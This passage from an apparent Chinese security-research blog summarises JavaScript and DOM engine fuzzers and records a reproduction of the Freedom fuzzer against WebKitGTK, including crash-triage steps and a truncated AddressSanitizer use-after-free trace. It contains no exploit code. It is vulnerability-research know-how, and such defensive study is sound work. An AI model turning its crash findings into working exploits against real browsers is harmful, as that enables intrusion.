bricks,一个语句块(BlockStatement)也可以变成code bricks。</p><p>code bricks之间相连时使用assembly constraint进行约束,它包含一个前置条件和一个后置条件。前置条件是一组变量符号及其类型,需要定义它们以执行代码块而不会出现运行时错误。后置条件描述了哪些类型的变量是可用的,即分析到代码块的末尾定义了哪些变量。</p></li></ul><h2 id="设计"><a href="#设计" class="headerlink" title="设计"></a>设计</h2><ul><li><p>Seed Fragmentization</p><p>递归遍历AST,每次都会提取出一个code brick</p></li><li><p>Code Brick Pool</p><p>重命名后去重</p></li><li><p>Data-Flow Analysis</p><p>分析code bricks结束时定义的变量,维护use-def链</p><p>不存在路径敏感,不考虑if分支间的差别</p></li><li><p>Code Brick Assembly</p><p>初始有4个参数,每次迭代增加一个code brick,可以时一句JS声明,也可以是第一步提取出的block,两者概率之和为1</p></li></ul><h1 id="Montage"><a href="#Montage" class="headerlink" title="Montage"></a>Montage</h1><p>Neural Network Language Model</p><h2 id="设计-1"><a href="#设计-1" class="headerlink" title="设计"></a>设计</h2><ul><li><p>fragment</p><p>fragment:使用fragment概念作为基本单元,将AST转为多个深度为1的子树,每个内部节点都会产生一个单元子树,称这样的子树为fragment</p></li><li><p>训练 LSTM 模型</p><p>修剪:将出现频率小于的fragment作为out-of-vocabulary (OoV).</p><p>建立静态语言模型,基于context(前面的所有fragment)预测下一个fragment</p></li><li><p>生成JS文件</p><p>取LSTM模型随机生成的种子AST,修复AST中的引用错误</p></li></ul><h1 id="Fuzzilli"><a href="#Fuzzilli" class="headerlink" title="Fuzzilli"></a>Fuzzilli</h1><p>引入自定义的IR——FuzzIL,与实际js引擎执行的字节码更接近,IR层面变异后转化为JS代码,这种方式有效继承了初始输入的控制流和数据流属性,保持了测试用例的语义合法性。</p><h2 id="问题"><a href="#问题" class="headerlink" title="问题"></a>问题</h2><ul><li>IR的样本空间不等于实际的JS代码空间</li></ul><h1 id="Sofi"><a href="#Sofi" class="headerlink" title="Sofi"></a>Sofi</h1><h2 id="设计-2"><a href="#设计-2" class="headerlink" title="设计"></a>设计</h2><ul><li><p>基于反射的分析来识别对象的不可见属性和方法</p><p>使用getOwnPropertyNames函数和getOwnPropertyNames函数,动态分析当前种子中的对象,存储可用的方法和属性</p></li><li><p>语义感知变异策略</p><p>变异操作只包含元素变异和元素插入,不包含删除</p><p>变异</p><ul><li>数值变异</li><li>表达式变异</li></ul><p>插入</p><ul><li>通过反射插入成员操作</li><li>插入其他输入样本中的声明,通过更保守的筛选方式减少插入内容对原语义的影响</li><li>插入对当前定义的函数的调用</li></ul></li><li><p>自动修复机制(在动态执行的过程中修复错误的语义)</p><p>启发式方法,调研非法变异并总结常见错误,基于规则进行修复。修复时会定位错误位置和引发错误的元素,如果不能修复则考虑删除</p><ul><li>ReferenceError</li><li>TypeError</li><li>RangeError</li><li>URIError</li></ul></li></ul><h1 id="DIE"><a href="#DIE" class="headerlink" title="DIE"></a>DIE</h1><p>定义了Aspect的概念,即很可能触发问题的元素,尽可能地保持影响控制流和数据依赖的重要代码结构。</p><p>大大提升了测试用例地合法性和定位深层bug(JIT优化过程中的缺陷)能力</p><p>利用反馈机制有效缩减了样本空间,减少无效变异</p><h2 id="设计-3"><a href="#设计-3" class="headerlink" title="设计"></a>设计</h2><p>Aspect-Preserving 变异,保持特殊结构和类型信息,避免了代码块可能导致的逻辑结构和原始语义破坏问题。基于高质量JS样本生成初始语料库,使用结构和类型保持的编译算法生成新测试用例。</p><p>aspect-preserving mutation包含两种变异策略:</p><ul><li>structure preservation:保存结构性aspect,如循环和行为</li><li>type preservation:保存每个句法元素的类型</li></ul><p>变异基于一种typed-AST,提供输入样本的结构化信息以及其中每个节点的type信息。</p><ul><li>Mutating a typed sub-AST</li><li>Inserting a statement</li><li>Introducing a new variable</li></ul><p>js中的类型系统没有限定每个变量的类型,且变量本身类型可能在运行中改变,本体提出了新的类型分类方法</p><ul><li>Mixed type:在运行时变化的类型,描述每个句法单元可能具有的所有类型</li><li>Detailed compound types:检查子元素类型,进一步分类<ul><li>数组:根据数组中元素进一步分类,如果数组中有各类元素或空元素,则视其为Any Array</li><li>Object:存储一个object的属性键和值</li><li>Function:考虑函数的参数和返回类型</li></ul></li></ul><p>通过更精简的类型,DIE可以更好地进行代码块的替换,减少语法错误</p><h1 id="JIT-Picking"><a href="#JIT-Picking" class="headerlink" title="JIT-Picking"></a>JIT-Picking</h1><ul><li><p>整体基于fuzzilli</p></li><li><p>引入差异测试,发现不触发crash的JIT漏洞</p></li></ul><h2 id="JS引擎差异测试"><a href="#JS引擎差异测试" class="headerlink" title="JS引擎差异测试"></a>JS引擎差异测试</h2><p>一个 JS 引擎包含两个实现来执行具有相同语义的 JS 代码:一个 JS 解释器逐条评估语句和一个 JIT 编译器生成积极优化的本机机器代码。根据 JS 引擎,一个或多个中间 JIT 层位于解释器和负责优化的编译器之间。这些层在解释器的低启动开销和完全优化的 JIT 引擎的高效代码执行之间提供了一个中间地带。</p>]]></content>
<tags>
<tag>Fuzz</tag>
<tag>JS Engine</tag>
</tags>
</entry>
<entry>
<title>Freedom复现笔记</title>
<link href="/2022/09/23/Freedom%E5%A4%8D%E7%8E%B0%E7%AC%94%E8%AE%B0/"/>
<url>/2022/09/23/Freedom%E5%A4%8D%E7%8E%B0%E7%AC%94%E8%AE%B0/</url>
<content type="html"><![CDATA[<h1 id="背景"><a href="#背景" class="headerlink" title="背景"></a>背景</h1><h2 id="DOM引擎漏洞"><a href="#DOM引擎漏洞" class="headerlink" title="DOM引擎漏洞"></a>DOM引擎漏洞</h2><p>本文尝试发现DOM引擎运行时的内存漏洞,漏洞会导致数据异常甚至RCE,其中可能包含完整的bug利用链</p><h2 id="介绍"><a href="#介绍" class="headerlink" title="介绍"></a>介绍</h2><p>已有fuzzer</p><ul><li>domfuzz</li><li>Bf3</li><li>cross_fuzz</li><li>Dharma</li><li>Avalanche</li><li>Wadi</li><li>Domato</li></ul><p>其中</p><ul><li><p>js动态fuzz(domfuzz\cross_fuzz)</p><p>在运行时抓取页面上的可用元素,并调用随机的DOM API调用来操作它们,直到浏览器崩溃。这种动态模糊器现在很少采用,因为目标浏览器实例在长时间运行后会老化,从而导致不稳定的执行和不可复制的崩溃。</p></li><li><p>静态生成fuzz(以Domato为代表)</p><p>根据描述规范的静态规则或语法从头开始生成语法正确的文档,并在有限的时间内用一个新的浏览器实例执行每个文档。但由于这些模糊器使用的规则和语法不完全是上下文敏感的,所以生成的文档会出现语义错误。</p><p>黑盒测试,不利用现有测试用例和反馈信息</p></li></ul><h1 id="传统模糊缺陷"><a href="#传统模糊缺陷" class="headerlink" title="传统模糊缺陷"></a>传统模糊缺陷</h1><h2 id="静态语法无效性"><a href="#静态语法无效性" class="headerlink" title="静态语法无效性"></a>静态语法无效性</h2><p>Domato使用上下文无关的语法描述HTML文档,这样很大程度上保证了语法正确性,但无法描述整个输入的每个数据依赖</p><ul><li><p>CSS selectors</p><p>Domato考虑一定数量的HTML、SVG元素,一定数量的预定义类名,所有的HTML、SVG标签。但在Domato随机生成的文件中,元素的数量和可供参考的标签或类名在生成前是不确定的。这会导致引用错误,或有效元素未被利用。</p></li><li><p>CSS property</p><ul><li><p>property是javascript对象的一个属性,attribute是html页面中某个元素element的属性,html页面被浏览器渲染的过程中,每一个element都会创建一个相应的javascript对象,而所有的attribute会被装载到attributes这个property上,这个attributes是一个array。</p></li><li><p>SVG <clipPath> 和 SVG <filter> 两种元素的生成方式不符合标准。</p></li></ul></li><li><p>Attribute name values</p><ul><li>以前的一些DOM错误涉及到一个元素的特定attribute的动态更新,由于Domato不知道文档中每一个现有的元素都有哪些attribute,所以它不能实现这些。</li><li>SVG的<animate>元素使用它的attributeName attribute来表示它的父元素的某个特定attribute要被动画化。由于不知道<animate>元素到底为哪个元素服务,Domato随机地将attributeName设置为任何可动画的SVG属性。例如,Domato可能会生成一个毫无价值的<animate>元素,试图改变一个<path>元素的不存在的x属性。</li></ul></li><li><p>Attribute values</p><ul><li><p>与CSS选择器和属性值类似,一个特定Attribute的值(如form和usemap )涉及到对一个特定类型的元素的引用(如<form>和<map>),这也没有被Domato正确描述。</p></li><li><p>一个属性值也可以对其他属性值有隐含的依赖性。关于<animate>元素,from属性的值是由同级属性attributeName的值决定的。如果不知道attributeName曾经产生的确切值,Domato的唯一选择是为from无状态地指定一些共同的属性值,这在大多数情况下不起作用。</p></li></ul></li></ul><h1 id="设计"><a href="#设计" class="headerlink" title="设计"></a>设计</h1><p>分布式DOM fuzzer,分为黑盒生成和覆盖率引导变异两部分(只开源了黑盒生成)</p><ul><li>黑盒生成<ul><li>基于FD-IR随机生成HTML文档</li><li>服务器只收集crash信息</li></ul></li><li>覆盖率引导<ul><li>服务器收集并维护测试用例队列、全局覆盖率表</li><li>fuzz实例从队列中获取样本,并在此基础上变异或融合其他文档</li><li>DOM引擎使用覆盖率instrument</li></ul></li></ul><h2 id="上下文敏感的文档表示"><a href="#上下文敏感的文档表示" class="headerlink" title="上下文敏感的文档表示"></a>上下文敏感的文档表示</h2><p>上下文被分为两类</p><ul><li>全局上下文:使用树结构,记录所有元素(包括tags/attributes),同时记录所有可用token(class names, CSS counter names, CSS keyframe, names 等)用于,两者分开管理</li><li>本地上下文:FD-IR为每个JavaScript函数描述了一个本地上下文,用来生成语义正确的DOM API调用。本地上下文不仅包含对全局上下文的引用,而且还在一个单独的地图保存本地每一个被API调用创建的DOM对象。与可以被一个函数中的任何API调用使用的全局元素不同,本地对象只有在被定义后才有效。因此,FD-IR也知道对象被删除的确切位置(即在哪一行),以支持各种API变异。</li></ul><h3 id="Value"><a href="#Value" class="headerlink" title="Value"></a>Value</h3><p>用于表示文件中可能出现的各类数据,如CSS selectors,<br>CSS properties, attributes and arguments and return values of API<br>calls</p><p>一个Value的定义包含3种方法</p><ul><li>generate:随机生成方法(基于全局或本地上下文)</li><li>mutate:随机变异方法</li><li>lower:FD-IR Value转化为文档中的字符串</li></ul><h4 id="具体例子"><a href="#具体例子" class="headerlink" title="具体例子"></a>具体例子</h4><p><img src="/image-20220904230408905.png" alt="IR类型示例"></p><ul><li>CSSProperty:复式Value,选择性地变异其内容</li><li>CSSFilter:使用CSSFilterValue定义</li><li>CSSFilterValue:basic Value(占大多数),不包含其他Value,直接通过生成代替变异</li><li>ReturnValue:作为上下文被引用的Value,它的生成方法在本地上下文引入了新的对象,因此不能进行变异,否则会导致后续API调用出错</li></ul><h4 id="分类"><a href="#分类" class="headerlink" title="分类"></a>分类</h4><ul><li>DOM tree:DOM树为多分支树,以 <body>为唯一根结点,DOM元素为结点,对每个元素节点,FD-IR记录元素类型、唯一id、子结点、属性列表,其中的每个属性都是Value instance</li><li>CSS rules:FD-IR记录CSS规则列表,对每条规则,维护的选择器列表、CSS property列表都属于Value instance</li><li>Event handlers:FD-IR记录事件处理器列表,其中body元素的onload事件处理被作为主事件处理器,文档中其他事件处理器的总数是预先定义的,在变异中不会增加。每个事件处理器都包含一组DOM API调用。</li></ul><h3 id="上下文敏感"><a href="#上下文敏感" class="headerlink" title="上下文敏感"></a>上下文敏感</h3><h4 id="文档生成"><a href="#文档生成" class="headerlink" title="文档生成"></a>文档生成</h4><p>从空白文档开始,其中只有一个<body>元素,一个空的主事件处理程序,以及一个空的事件处理程序列表。然后,FD-IR使用各种方法按照DOM树、CSS规则和事件处理程序的顺序构建文档内容,这涉及大量的上下文查询和更新。</p><ul><li>DOM tree generation(最优先)</li></ul><h1 id="分析"><a href="#分析" class="headerlink" title="分析"></a>分析</h1><p>环境:</p><ul><li>5台24核服务器</li><li>Ubuntu 18.04 with AMD Ryzen 9 3900X</li><li>64GB memory</li><li>X virtual frame buffer (Xvfb)</li></ul><p>测试方式:</p><ul><li>量级:每个fuzzer运行100个实例,跑24小时</li><li>target:ASan build of WebKitGTK 2.28.0</li><li>coverage:使用instumented WebKit重新运行文档,获取DOM引擎代码覆盖率情况</li></ul><h2 id="FD-G-和以往fuzzer对比"><a href="#FD-G-和以往fuzzer对比" class="headerlink" title="FD(G)和以往fuzzer对比"></a>FD(G)和以往fuzzer对比</h2><h3 id="Dharma"><a href="#Dharma" class="headerlink" title="Dharma"></a>Dharma</h3><p><img src="/image-20220828152635314.png" alt="Dharma效果"></p><h3 id="Domato"><a href="#Domato" class="headerlink" title="Domato"></a>Domato</h3><p><img src="/image-20220828153118312.png" alt="Domato效果"></p><h2 id="FD-G-对比FD-M"><a href="#FD-G-对比FD-M" class="headerlink" title="FD(G)对比FD(M)"></a>FD(G)对比FD(M)</h2><p>M虽然能够比G发现部分新crash,但会错失更多的crash。</p><p>因为FDM尝试扩张代码覆盖率的变异没有一个具体方向,因此反而不能触发对应的漏洞。虽然FDG盲目生成的文档在时间过程中永远无法彻底探索浏览器的代码,但至少FDG在每次执行时都会持续测试某些深层代码路径,这是因为生成的文档具有较大的规模和丰富的语义。相比之下,代码覆盖使得从空白文档开始的FDM在众多浅层代码路径中徘徊,并且由于DOM引擎的极端复杂性,在很长一段时间内无法向下移动。</p><p>总的来说,黑盒生成并不全面,但对于在合理的时间内发现DOM引擎中大量的bug来说,仍然是值得推荐的。同时,覆盖率驱动的突变也被认为是一种不可替代的方法,特别是对于发现那些在严格条件下发生的错误。基于突变的模糊处理的另一个优点是,最小化其崩溃的文件尺寸要小得多,耗时也少。我们也相信,如果有更多的计算资源和更好的种子输入,它的性能可以在很大程度上得到改善。</p><p><img src="/image-20220828153826150.png" alt="Freedom效果"></p><h1 id="DOM-x2F-JS-FUZZ领域issue"><a href="#DOM-x2F-JS-FUZZ领域issue" class="headerlink" title="DOM/JS FUZZ领域issue"></a>DOM/JS FUZZ领域issue</h1><ul><li>如何生成语义正确的测试用例——Freedom\SoFi\favocado<ul><li>Freedom:IR中间语言,按约束生成</li><li>SoFi:JavaScript Dynamic Reflection,动态修复语义错误</li><li>favocado:收集语义信息,将其分为等类;解析Interface Definition Language (IDL)</li></ul></li><li>如何高效发掘API之间深层次的关系——Montage<ul><li>Montage:调用API,观察API之间是否存在内存交互</li></ul></li></ul><h1 id="Freedom复现"><a href="#Freedom复现" class="headerlink" title="Freedom复现"></a>Freedom复现</h1><h2 id="运行环境"><a href="#运行环境" class="headerlink" title="运行环境"></a>运行环境</h2><ul><li>使用xvfb-run实现无图形界面的浏览器运行</li></ul><h2 id="crash检测脚本"><a href="#crash检测脚本" class="headerlink" title="crash检测脚本"></a>crash检测脚本</h2><ol><li><p>执行FD(G)的文件生成</p></li><li><p>处理生成的文件,添加自动退出js命令</p></li><li><p>对执行返回结果进行检测</p><ul><li><p>返回值为1,说明文件被全部执行,无crash</p></li><li><p>timeout说明文件在执行中crash,进一步处理</p></li><li><p>排除crash中的语法错误</p><figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs awk">==<span class="hljs-number">4594</span>==AddressSanitizer CHECK failed: ..<span class="hljs-regexp">/../</span>..<span class="hljs-regexp">/../</span>src<span class="hljs-regexp">/libsanitizer/</span>asan/asan_poisoning.cc:<span class="hljs-number">37</span> <br></code></pre></td></tr></table></figure><p>此处的check fail指代码在检查阶段中发现错误导致的直接崩溃</p><p>由于webkit在release版本同样存在检查,所以这样的报错并不能用于release版本</p></li></ul></li><li><p>保存有效结果</p><p>2个进程运行一天,得到总计5个有效crash样本</p><figure class="highlight apache"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><code class="hljs apache"><span class="hljs-attribute">uaf</span>:<br><span class="hljs-attribute">crashes</span>/<span class="hljs-number">1</span>-<span class="hljs-number">166375168412</span>.html<br><span class="hljs-attribute">crashes</span>/<span class="hljs-number">1</span>-<span class="hljs-number">166378535004</span>.html<br><span class="hljs-attribute">crashes</span>/<span class="hljs-number">1</span>-<span class="hljs-number">166379051542</span>.html<br><span class="hljs-attribute">crashes</span>/<span class="hljs-number">1</span>-<span class="hljs-number">166379150950</span>.html<br><span class="hljs-attribute">SIGV</span>:<br><span class="hljs-attribute">crashes</span>/<span class="hljs-number">1</span>-<span class="hljs-number">166377133300</span>.html<br></code></pre></td></tr></table></figure></li></ol><h2 id="样本分析"><a href="#样本分析" class="headerlink" title="样本分析"></a>样本分析</h2><p>暂时看不懂,需要结合代码具体分析。</p><figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs awk">xvfb-run -a ..<span class="hljs-regexp">/webkitgtk-2.28.0/</span>bin<span class="hljs-regexp">/MiniBrowser $FUZZDIR/</span><span class="hljs-variable">$i</span><br></code></pre></td></tr></table></figure><figure class="highlight dns"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br><span class="line">131</span><br><span class="line">132</span><br><span class="line">133</span><br><span class="line">134</span><br><span class="line">135</span><br><span class="line">136</span><br><span class="line">137</span><br><span class="line">138</span><br><span class="line">139</span><br><span class="line">140</span><br><span class="line">141</span><br><span class="line">142</span><br><span class="line">143</span><br><span class="line">144</span><br><span class="line">145</span><br><span class="line">146</span><br><span class="line">147</span><br><span class="line">148</span><br><span class="line">149</span><br><span class="line">150</span><br><span class="line">151</span><br><span class="line">152</span><br><span class="line">153</span><br><span class="line">154</span><br><span class="line">155</span><br><span class="line">156</span><br><span class="line">157</span><br><span class="line">158</span><br><span class="line">159</span><br><span class="line">160</span><br><span class="line">161</span><br><span class="line">162</span><br><span class="line">163</span><br><span class="line">164</span><br><span class="line">165</span><br><span class="line">166</span><br><span class="line">167</span><br><span class="line">168</span><br><span class="line">169</span><br><span class="line">170</span><br><span class="line">171</span><br><span class="line">172</span><br><span class="line">173</span><br><span class="line">174</span><br><span class="line">175</span><br><span class="line">176</span><br><span class="line">177</span><br><span class="line">178</span><br><span class="line">179</span><br><span class="line">180</span><br><span class="line">181</span><br><span class="line">182</span><br><span class="line">183</span><br><span class="line">184</span><br><span class="line">185</span><br><span class="line">186</span><br><span class="line">187</span><br><span class="line">188</span><br><span class="line">189</span><br><span class="line">190</span><br><span class="line">191</span><br><span class="line">192</span><br><span class="line">193</span><br><span class="line">194</span><br><span class="line">195</span><br><span class="line">196</span><br><span class="line">197</span><br><span class="line">198</span><br><span class="line">199</span><br><span class="line">200</span><br><span class="line">201</span><br><span class="line">202</span><br></pre></td><td class="code"><pre><code class="hljs dns">WARNING: ASAN interferes with JSC signal handlers<span class="hljs-comment">; useWebAssemblyFastMemory will be disabled.</span><br>WARNING: ASAN interferes with JSC signal handlers<span class="hljs-comment">; useWebAssemblyFastMemory will be disabled.</span><br>WARNING: ASAN interferes with JSC signal handlers<span class="hljs-comment">; useWebAssemblyFastMemory will be disabled.</span><br>=================================================================<br>==<span class="hljs-number">12747</span>==ERROR: AddressSanitizer: heap-use-after-free on address <span class="hljs-number">0</span>x60<span class="hljs-number">70000b4a48</span> at pc <span class="hljs-number">0</span>x7fbd<span class="hljs-number">05950b28</span> bp <span class="hljs-number">0</span>x7ffc5fa5d6a0 sp <span class="hljs-number">0</span>x7ffc5fa5d690<br>READ of size <span class="hljs-number">4</span> at <span class="hljs-number">0</span>x60<span class="hljs-number">70000b4a48</span> thread T0<br> #<span class="hljs-number">0</span> <span class="hljs-number">0</span>x7fbd<span class="hljs-number">05950b27</span> in WT<span class="hljs-number">F::</span>HashTable<WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> >, WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> >, WT<span class="hljs-number">F::</span>IdentityExtractor, WT<span class="hljs-number">F::</span>PtrHash<WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> > >, WT<span class="hljs-number">F::</span>HashTraits<WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> > >, WT<span class="hljs-number">F::</span>HashTraits<WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> > > ><span class="hljs-number">::</span>tableSizeMask() const DerivedSources/ForwardingHeaders/wtf/HashTable.h:<span class="hljs-number">585</span><br> #<span class="hljs-number">1</span> <span class="hljs-number">0</span>x7fbd<span class="hljs-number">05950b27</span> in WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> >* WT<span class="hljs-number">F::</span>HashTable<WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> >, WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> >, WT<span class="hljs-number">F::</span>IdentityExtractor, WT<span class="hljs-number">F::</span>PtrHash<WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> > >, WT<span class="hljs-number">F::</span>HashTraits<WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> > >, WT<span class="hljs-number">F::</span>HashTraits<WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> > > ><span class="hljs-number">::</span>inlineLookup<WT<span class="hljs-number">F::</span>IdentityHashTranslator<WT<span class="hljs-number">F::</span>HashTraits<WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> > >, WT<span class="hljs-number">F::</span>PtrHash<WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> > > >, WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> > >(WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> > const&) DerivedSources/ForwardingHeaders/wtf/HashTable.h:<span class="hljs-number">675</span><br> #<span class="hljs-number">2</span> <span class="hljs-number">0</span>x7fbd<span class="hljs-number">05950b27</span> in WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> >* WT<span class="hljs-number">F::</span>HashTable<WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> >, WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> >, WT<span class="hljs-number">F::</span>IdentityExtractor, WT<span class="hljs-number">F::</span>PtrHash<WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> > >, WT<span class="hljs-number">F::</span>HashTraits<WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> > >, WT<span class="hljs-number">F::</span>HashTraits<WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> > > ><span class="hljs-number">::</span>lookup<WT<span class="hljs-number">F::</span>IdentityHashTranslator<WT<span class="hljs-number">F::</span>HashTraits<WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> > >, WT<span class="hljs-number">F::</span>PtrHash<WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> > > >, WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> > >(WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> > const&) DerivedSources/ForwardingHeaders/wtf/HashTable.h:<span class="hljs-number">661</span><br> #<span class="hljs-number">3</span> <span class="hljs-number">0</span>x7fbd<span class="hljs-number">05950b27</span> in WT<span class="hljs-number">F::</span>HashTableConstIterator<WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> >, WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> >, WT<span class="hljs-number">F::</span>IdentityExtractor, WT<span class="hljs-number">F::</span>PtrHash<WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span 